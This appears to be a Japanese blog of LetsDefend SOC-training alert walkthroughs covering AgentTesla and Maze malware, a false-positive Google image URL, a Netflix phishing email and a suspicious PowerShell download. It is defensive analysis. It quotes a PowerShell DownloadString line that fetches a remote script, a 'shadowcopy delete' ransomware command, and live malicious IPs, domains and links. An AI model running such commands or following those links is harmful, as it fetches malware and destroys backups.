2022-03-11

LetsDefend level 1 alert SOC104 - Malware Detected event-id 31

LetsDefend

Details
playbook
End

Details

EventID: 31
Event Time: Oct. 29, 2020, 7:55 p.m.
Rule: SOC104 - Malware Detected
Level: Security Analyst
Source Address 172.16.17.82
Source Hostname JohnComputer
File Name Purchase-Order_NO.231101.exe
File Hash cdde99520664ac313d43964620019c61
File Size 616.50 KB
Device Action Allowed
Download (Password:infected): cdde99520664ac313d43964620019c61.zip

playbook

Define Threat Indicator

Answer:Other

Check if the malware is quarantined/cleaned

Answer:Not Quarantined

Analyze Malware

cdde99520664ac313d43964620019c61

VirusTotal 59/71: https://www.virustotal.com/gui/file/40618ab352c23e61bb192f2aedd9360fed2df2a25d42491d0ab56eda5c2db558/details
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/40618ab352c23e61bb192f2aedd9360fed2df2a25d42491d0ab56eda5c2db558/5f9b6efb6bd0564272401a5f
ここまで真っ赤であるならばMaliciousのハズだ。VirusTotalのレポートには、AgentTeslaの文字列が。
Agent Tesla Malware Analysis, Overview by ANY.RUN
動作を見ると、
ANYRUN: https://app.any.run/tasks/a9037684-a6b1-4402-b97b-7fbdcf94e26c/
色々なブラウザやメーラーのデータを探したり、自動起動の設定をしている。機能としてはAgentTeslaのようにも見える。

Endpoint - JohnComputer

Process History

cdde99520664ac313d43964620019c61が、しっかり実行されている。

Purchase-Order_NO.231101.exe
MD5:cdde99520664ac313d43964620019c61
Size:616.50 KB
Path:c:/Users/John/Downloads/Purchase-Order_NO.231101.exe

Logsearch

#	DATE	TYPE	SOURCE ADDRESS	SOURCE PORT	DESTINATION ADDRESS	DESTINATION PORT
Oct, 29, 2020, 08:06 PM	Firewall	172.16.17.82	49758	208.91.199.223	587

アラートが上がった後に近い時間にログに残っているアクセスは、 VirusTotalやANYRUNでマルウェアの実行時にアクセスされていた「smtp.japhethpumps[.]com」かと思っていたが、違った。
208.91.199.223 -> smtp.nmb[.]us
Reverse IP Lookup - ViewDNS.info
ただ、VirusTotal等で確認してみるとベンダーには登録されていないものの、
VirusTotal: https://www.virustotal.com/gui/ip-address/208.91.199.223/details
いくつかマルウェアと関連を示唆するようなレポートが多いIPのようだ。

Answer:Malicious

Check If Someone Requested the C2

通信の中身は確認できていないが、VirusTotalのレポートにあるようにマルウェアの実行後に587へのアクセスが確認された。
Answer:Accessed

Containment

Containment!

Add Artifacts

Value	Type	Comment
cdde99520664ac313d43964620019c61	MD5 Hash	malware - agenttesla?
208.91.199.223	IP Address	C2 server. smtp.nmb[.]us

True Positive.

End

f:id:Zarat:20220311204550p:plain — close alert 31

2022-03-06

LetsDefend level 1 alert SOC102 - Proxy - Suspicious URL Detected event-id 32

LetsDefend

Details
playbook
End

Details

EventID: 32
Event Time: Dec. 1, 2020, 5:50 a.m.
Rule: SOC102 - Proxy - Suspicious URL Detected
Level: Security Analyst
Source Address 172.148.17.14
Source Hostname MikeComputer
Destination Address 172.217.17.174
Destination Hostname encrypted-tbn0.gstatic.com
Username Mike01
Request URL https[:]//encrypted-tbn0.gstatic[.]com/images?q=tbn:ANd9GcSjESkzn2LUxELhnqZZWBbmGwtbqfFsaemB9w&usqp=CAU
User Agent Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1
Device Action Blocked

playbook

Search Log

#	DATE	TYPE	SOURCE ADDRESS	SOURCE PORT	DESTINATION ADDRESS	DESTINATION PORT
Dec, 01, 2020, 05:58 AM	Proxy	172.148.17.14	48193	172.217.17.174	443

Request URL: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSjESkzn2LUxELhnqZZWBbmGwtbqfFsaemB9w&usqp=CAU
Request Method: GET
Device Action: Blocked
Process: chrome.exe
Parent Process: explorer.exe
Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e

同サーバのアクセスは、アラート時のもののみを確認された。
Endpointを見ると、気になるdocファイルの実行が見られたが今回のものとは関係無さそうなので一旦置いておく。
このサーバへのアクセスはアラート時のもののみ。

Analyze URL Address

https[:]//encrypted-tbn0.gstatic[.]com/images?q=tbn:ANd9GcSjESkzn2LUxELhnqZZWBbmGwtbqfFsaemB9w&usqp=CAU

Hybrid-Analysis: https://www.hybrid-analysis.com/sample/aa243e9bc80b1d466a8d3e9f1d2a285b8445f47bb173835ad1066aa8ebf63675/61e30b6bb545d72fa270b2c3
実際にアクセスしてみると、何かの画像であった。

f:id:Zarat:20220305215214p:plain — suspicious URL?

そもそも、gstatic[.]comとは
gstatic.comは何に使用されますか?あなたが知る必要があるすべて！ - JA Atsit
What is gstatic.com used for? All you need to know!
公式の文言が見つからなかったが、Googleの画像キャッシュサーバのようだ。無知でした。
そうであるならば、今回のURLは問題ないと言えるのではないだろうか。
一応、ドメインやIPも。

encrypted-tbn0.gstatic[.]com

VirusTotal: https://www.virustotal.com/gui/domain/encrypted-tbn0.gstatic.com/community
いくらかコメントがあるが、時と場合によっては怪しい画像へリンクされたためだろうか。

172.217.17.174

VirusTotal: https://www.virustotal.com/gui/ip-address/172.217.17.174/community
googleであると。

以上から
Answer:Non-malicious

Add Artifacts

Value	Type	Comment
https[:]//encrypted-tbn0.gstatic[.]com/images?q=tbn:ANd9GcSjESkzn2LUxELhnqZZWBbmGwtbqfFsaemB9w&usqp=CAU	URL Address	Google's image cache
172.217.17.174	IP Address	Google's image cache server

False Positive.

End

f:id:Zarat:20220306040145p:plain — close alert 32

今回は誤検知であったという結果になったが、そもそも誤検知となった理由があるはずである。それは、単純にルールのミスなのか過去にencrypted-tbn0.gstatic.comへのアクセスが悪用されたのか分からないが、この理由をはっきりさせなければ今後の検知精度向上には繋がらない。

2022-03-04

LetsDefend level 1 alert SOC104 - Malware Detected event-id 36

LetsDefend Malware

Details
playbook
End

Details

EventID: 36
Event Time: Dec. 1, 2020, 10:23 a.m.
Rule: SOC104 - Malware Detected
Level: Security Analyst
Source Address 10.15.15.18
Source Hostname AdamPRD
File Name Invoice.exe
File Hash f83fb9ce6a83da58b20685c1d7e1e546
File Size 473.00 KB
Device Action Allowed
Download (Password:infected): f83fb9ce6a83da58b20685c1d7e1e546.zip

playbook

Define Threat Indicator

Answer:Other

Check if the malware is quarantined/cleaned

Answer:Not Quarantined

Analyze Malware

f83fb9ce6a83da58b20685c1d7e1e546

VirusTotal 59/70: https://www.virustotal.com/gui/file/e8a091a84dd2ea7ee429135ff48e9f48f7787637ccb79f6c3eb42f34588bc684
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/e8a091a84dd2ea7ee429135ff48e9f48f7787637ccb79f6c3eb42f34588bc684/5fcd31635d0d89567317ef92
VirusTotalの結果がここまで真っ赤なのであればマルウェアであることには間違いなさそうだ。VirusTotalのレポートには、92.63.X.Xへのアクセスが多いこととmazeの名前が見られる。
Hybrid-Analysisのレポートには、

Deletes volume snapshots (often used by ransomware) - details Deletes volume snapshots files "WMIC.exe" with commandline "shadowcopy delete"

とある。これは実は知らなかったのだが、ランサムウェアはバックアップもちゃんと消した上でランサムするのですね。
ANYRUN: https://app.any.run/tasks/9f011389-db62-4de7-8d26-9bc04cec2534/
実行すると、ファイルを書き換え、Firefoxのデータを取得したり、バックアップを消す。 ANYRUNからmazeランサムウェアであることが分かった。
Maze Malware Analysis, Overview by ANY.RUN

Maze creators revealed that after infecting the initial endpoint, their ransomware targets cloud backups by laterally spreading through the network and stealing needed credentials.

バックアップをとことん削除まで狙うのはmazeの特徴なのだろうか。
さて、肝心のマルウェアだがexeファイルの解析は未だほとんどできないので今後に期待いただきたい。

Log Search

先ほど上がったC2サーバ92.63.X.Xへのアクセスはあるかを確認すると、

#	DATE	TYPE	SOURCE ADDRESS	SOURCE PORT	DESTINATION ADDRESS	DESTINATION PORT
Dec, 01, 2020, 10:30 AM	Proxy	10.15.15.18	49832	92.63.8.47	443

URL: http://92.63.8.47/

これは実行されていそうだ。Endpointにログが見つからないが実行されたと判断して良さそうだ。

92.63.8.47

VirusTotal: https://www.virustotal.com/gui/ip-address/92.63.8.47/detection
ip-sc : https://ip-sc.net/ja/r/92.63.8.47
アクセス先はトルコのサーバである。MAZE.

Answer:Malicious

Check If Someone Requested the C2

先にアクセス確認済み。
Answer:Accessed

Containment

Containment!

Add Artifacts

Value	Type	Comment
f83fb9ce6a83da58b20685c1d7e1e546	MD5 Hash	maze ransomware
92.63.8.47	IP Address	maze ransomware C2
10.15.15.18	IP Address	infected

True Positive.

End

f:id:Zarat:20220304224748p:plain — close alert 36

今回のようなケースだと、ランサムウェアなので感染端末に分かりやすく影響があるために相談を受けてから調査が始まるような場合が多いように思えるが、もしかすると企業であれば個人が自身の失態を隠そうとして報告せずにアラートから調査が始まるようなケースもあるのだろうか。

2022-03-02

LetsDefend level 1 alert SOC101 - Phishing Mail Detected event-id 34

LetsDefend

Details
playbook
End

Details

EventID: 34
Event Time: Dec. 5, 2020, 10:33 p.m.
Rule: SOC101 - Phishing Mail Detected
Level: Security Analyst
SMTP Address 112.85.42.180
Source Address admin@netflix-payments.com
Destination Address emily@letsdefend.io
E-mail Subject Netflix Deals!
Device Action Allowed

playbook

E-mail Subject: Netflix Deals!

From: admin@netflix-payments.com
admin@netflix-payments.com Dec. 5, 2020, 10:33 p.m.
->
To: emily@letsdefend.io
emily@letsdefend.io Dec. 5, 2020, 10:33 p.m.


Hey,

Register now and get 2 months free membership!

http://bit.ly/3ecXem52

Netflix.

Are there attachments or URLs in the email?

Answer:Yes

Analyze Url/Attachment

http[:]//bit.ly/3ecXem52

リンク先の確認を行う。
とりあえずのところ、現在はリンク先を確認できない。
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/3be0a7d94496ea7176e45463e09429f856a0f5cf2321c5378c363439a94b3921/5fcf987e5b15c81b920f89c9
Malicious Indicatorsがあるがbit.lyに対してである。よくよくスクリーンショット見てみると、リンク先が確認できている訳ではなさそうだ。

netflix-payments.com

送信元ドメインを調査する。
VirusTotal: https://www.virustotal.com/gui/domain/netflix-payments.com
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/e7197871d3093a8c017544dd0cffcac5c457b581d400bc286a2f55949d278994?environmentId=120
過去にはVirusTotalで3/79というレポートがある。リンク先の内容はこちらでも確認できない。
ViewDNS whois: https://viewdns.info/whois/?domain=netflix-payments.com
そもそも、ドメインレジストラを使っていたりNetflixと関係は無さそうで怪しい。

112.85.42.180

送信元のIPを調査する。
VirusTotal: https://www.virustotal.com/gui/ip-address/112.85.42.180
AbuseIPDB: https://www.abuseipdb.com/check/112.85.42.180
ip-sc: https://ip-sc.net/ja/r/112.85.42.180
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/004e716bb3c39e8f56a9a468e3db239410685b7d2f8eb97d07f9fc89adffb465?environmentId=120
SSH bruteforce attack元であるというレポートが複数確認された。
過去にはVirusTotalで7/73というレポートがある。
これはMaliciousであると判断する。

Answer:Malicious

Check If Mail Delivered to User?

Device Action Allowed

Answer:Delivered

Check If Someone Opened the Malicios File/URL?

Log Searchにはhttp[:]//bit.ly/3ecXem52へのアクセスを確認されず。
Answer:Not Opened

Add Artifacts

Value	Type	Comment
admin@netflix-payments.com	E-mail Sender
netflix-payments.com	E-mail Domain	godaddy - domain reristrar
http[:]//bit.ly/3ecXem52	URL Address
112.85.42.180	IP Address	VirusTotal - 7/73. SSH bruteforce attack IP.

True Positive.

End

f:id:Zarat:20220301235832p:plain — close alert 34

ログに無かったためにhttp[:]//bit.ly/3ecXem52へアクセスしていないと考えたが違ったようだ。
Endpointを確認してみると、

Browser History

2020-12-05 14:13: https://github.com/SecurityRiskAdvisors/VECTR/blob/master/VECTREndUserLicenseAgreement.pdf
2020-12-05 14:14: https://github.com/SecurityRiskAdvisors
2020-12-05 14:15: https://github.com/SecurityRiskAdvisors/VECTR
2020-12-05 14:16: https://github.com/SecurityRiskAdvisors/VECTR/blob/master/README.md
2020-12-05 22:13: http://bit.ly/3ecXem52
2020-12-05 22:15: http://places.hayatistanbul.net/wp-content/themes/Netflix

確かにアクセスしている。今後は何らかの要因でログに記録されないことも見据えて、ログだけでなくEndpointの調査を必要そうだ。
さらに言えば、wordpressのNetFlixテーマ？にアクセスしているのも気になるが、このURLだけではほとんど情報が確認できないため今回はこの調査は見送る。

2022-02-27

LetsDefend level 1 alert SOC102 - Proxy - Suspicious URL Detected event-id 35

LetsDefend

Details
playbook
End

Details

EventID: 35
Event Time: Dec. 6, 2020, 1:33 p.m.
Rule: SOC102 - Proxy - Suspicious URL Detected
Level: Security Analyst
Source Address 172.16.17.51
Source Hostname Aldo
Destination Address 66.198.240.56
Destination Hostname interalliance.org
Username aldo
Request URL https[:]//interalliance.org/come2/holme/folde/swiftcopy.ps1
User Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Device Action Allowed

playbook

Search Log

ログを見ると、interalliance[.]orgへのアクセスは残っていなかった。

Analyze URL Address

66.198.240.56

VirusTotal: https://www.virustotal.com/gui/ip-address/66.198.240.56/community
ip-sc: https://ip-sc.net/ja/r/66.198.240.56
VirusTotalにはMalicious判定は無いが、emotetとの関連があるようなレポートがある。
サーバはA2 Hostingらしい。
Best Web Hosting Services | A2 Hosting

http[:]//interalliance.org/

urlscan.io: https://urlscan.io/result/e65360fc-bbe4-43bb-8393-c93451b9e959/#summary
何かしらのWebサイトが動いていたようだ。

https[:]//interalliance.org/come2/holme/folde/swiftcopy.ps1

urlscan.io: https://urlscan.io/result/7d839378-54a9-45ae-a79e-24d89b63a9de/
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/c1b519da6034a9abbe2dd29cf51245be5831567b69788002cf66b4d5deb15493/5fcdac5f92d302697315038f
VirusTotal: https://www.virustotal.com/gui/url/dac6a8c1990738cf7ab5e74ef3ba7ed3075640a374be80804db42e5ce1cd53e2/detection
VirusTotalの結果は最近のアクセスで404になっているためにMalicious判定されていないが、Hybrid-Analysisの過去の解析の結果ではアクセスできたために？Maliciousとなっている。
interalliance[.]orgは異なる二つのIPがある。アラートで上がっていた66.198.240.56はウェブホスティングサービスのA2 HostingのIPだが、swiftcopy.ps1へのアクセスをurlscanで見ると35.209.19.126というGoogle CloudのIPとなっている。
このため、swiftcopy.ps1は偽サイトで配布されているのでは。
このサイトはwordpressに関連しそうな文字列が見受けられるために、wordpressの脆弱性を用いて乗っ取られたことも考えられる。
例えば、

https://interalliance.org/wp-content/uploads/

このようなURLがHTTPのresponseから見られる。
swiftcopy.ps1が取得できなかったために、これ以上の解析はできない。

明らかに、このサイトは怪しい動作をしているかつ.ps1ということはpowershell スクリプトを配布しているのも怪しい。
Answer: Malicious

Has Anyone Accessed IP/URL/Domain?

アラートが上がっているので今回のURLにアクセスしている。
Answer: Accessed

Containment

Endpoint - Aldo(172.16.17.51)

Process History

(snip)
.DownloadString('https://interalliance.org/come2/holme/folde/swiftcopy.ps1');s $tc

今回のアラートの引き金になったSuspicious URLへのアクセスはpoweshellスクリプトが引き金になっている。
このスクリプトを全て載せるとアンチウイルスソフトに止められて記事編集ページに飛べなくなってしまったので省略。

CMD History

06.12.2020 12:18: tasklist
06.12.2020 12:19: net user
06.12.2020 12:20: net user aldo
06.12.2020 12:21: ping 172.16.20.3
06.12.2020 12:22: shutdown -r

今回のアラートの前に何かコマンドが動いている。

Add Artifacts

Value	Type	Comment
66.198.240.56	IP Address	interalliance.org
https[:]//interalliance.org/come2/holme/folde/swiftcopy.ps1	URL Address	A file distributed from a fake website?

True Positiveを選択した。

End

f:id:Zarat:20220227162947p:plain — close alert event-id 35

今回は怪しいURL先を確認できないために獲得可能な情報からだけだと、推測に推測を重ねることで判断が必要なアラートであった。
アラートは早めに対処すべき。